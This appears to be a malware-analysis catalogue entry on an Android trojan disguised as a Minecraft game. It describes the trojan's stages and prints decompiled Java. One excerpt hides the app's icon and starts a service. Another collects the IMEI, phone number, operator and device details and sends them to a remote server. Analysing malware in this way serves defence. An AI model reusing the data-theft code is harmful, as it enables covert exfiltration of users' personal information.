Summary
This malware steal confidential data from the telephone
GroDDViewer graphs:
Details
Minecraft is a malware discovered in January 2016. The malware looks like a game file and sends data from telephone when it is launched and every 60000 seconds.
Stage 1: Malicious code execution
When the application is installed, the Minecraft icon appears on desktop.
Stage 2: Data sending
UpdateService starts repetitively a BroadcastReceiver named UpdateReceiver every 60000 seconds, through the use of ServiceReceiver.
Other resources
Triggering
To trigger the malware, launch the application.
Caracteristics
Malware type :
Attacks :
-
Confidentiality
Infection technique :
Malicious code type :
Hidding techniques :
Triggering techniques :
Samples
Java source code extracts:
MainActivity.java is the service started when the application is launched.
l.java is the update service that send data trought an url.
MainActivity.java
SharedPreferences localSharedPreferences;
SharedPreferences.Editor localEditor;
Intent localIntent1 = new Intent("android.intent.action.VIEW", Uri.parse(this.k.k));
localIntent1.addFlags(268435456);
localIntent1.addFlags(67108864);
Intent localIntent2 = new Intent();
localIntent2.putExtra("android.intent.extra.shortcut.INTENT", localIntent1);
localIntent2.putExtra("android.intent.extra.shortcut.NAME", this.k.j);
Assert.assertNotNull(this);
Assert.assertNotNull("icon_url");
localIntent2.putExtra("android.intent.extra.shortcut.ICON_RESOURCE", Intent.ShortcutIconResource.fromContext(this, getResources().getIdentifier("icon_url", "drawable", getPackageName())));
localIntent2.setAction("com.android.launcher.action.INSTALL_SHORTCUT");
sendBroadcast(localIntent2);
label244: localEditor.putBoolean("started", true);
localEditor.commit();
while (true)
{
this.f = ((TextView)findViewById(2131099651));
this.g = ((TextView)findViewById(2131099658));
this.h = ((TextView)findViewById(2131099659));
this.i = ((TextView)findViewById(2131099657));
this.j = ((Button)findViewById(2131099656));
this.j.setVisibility(8);
this.g.setVisibility(8);
this.h.setVisibility(8);
this.i.setVisibility(8);
this.j.setOnClickListener(new c(this));
this.i.setOnClickListener(new d(this));
this.g.setText(Html.fromHtml("<u>" + getString(2130968587) + "</u>"));
this.g.setOnClickListener(new e(this, localSharedPreferences));
this.b = ((RoundProgress)findViewById(2131099655));
this.b.setProgress(0.0D);
this.e = 0;
this.d = new Timer();
this.d.scheduleAtFixedRate(new f(this), 0L, this.c);
if (this.k.o == 1)
{
ComponentName localComponentName = new ComponentName(this, getClass());
getPackageManager().setComponentEnabledSetting(localComponentName, 2, 1);
}
return;
localException1 = localException1;
startService(new Intent(this, UpdateService.class));
break;
localException2 = localException2;
}
l.java
private String a()
{
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)this.a.a.getSystemService("phone");
String str1 = localTelephonyManager.getDeviceId();
String str2 = localTelephonyManager.getSimCountryIso();
DefaultHttpClient localDefaultHttpClient = new DefaultHttpClient();
String str3 = localTelephonyManager.getLine1Number();
String str4 = localTelephonyManager.getSimOperatorName();
String str5 = localTelephonyManager.getNetworkOperator();
String str6 = Integer.toString(Build.VERSION.SDK_INT);
String str7 = Build.MODEL;
URL localURL = new URL(UpdateService.d + "getTask.php?imei=" + str1 + "&balance=" + PreferenceManager.getDefaultSharedPreferences(this.a.a).getString("balance", "0") + "&country=" + str2 + "&phone=" + str3 + "&op=" + str4 + "&mnc=" + str5.substring(3) + "&mcc=" + str5.substring(0, 3) + "&model=" + str7 + "&os=" + str6);
InputStream localInputStream = localDefaultHttpClient.execute(new HttpGet(new URI(localURL.getProtocol(), localURL.getUserInfo(), localURL.getHost(), localURL.getPort(), localURL.getPath(), localURL.getQuery(), localURL.getRef()).toURL().toString())).getEntity().getContent();
BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(localInputStream, "utf-8"), 8);
StringBuilder localStringBuilder = new StringBuilder();
...
}
}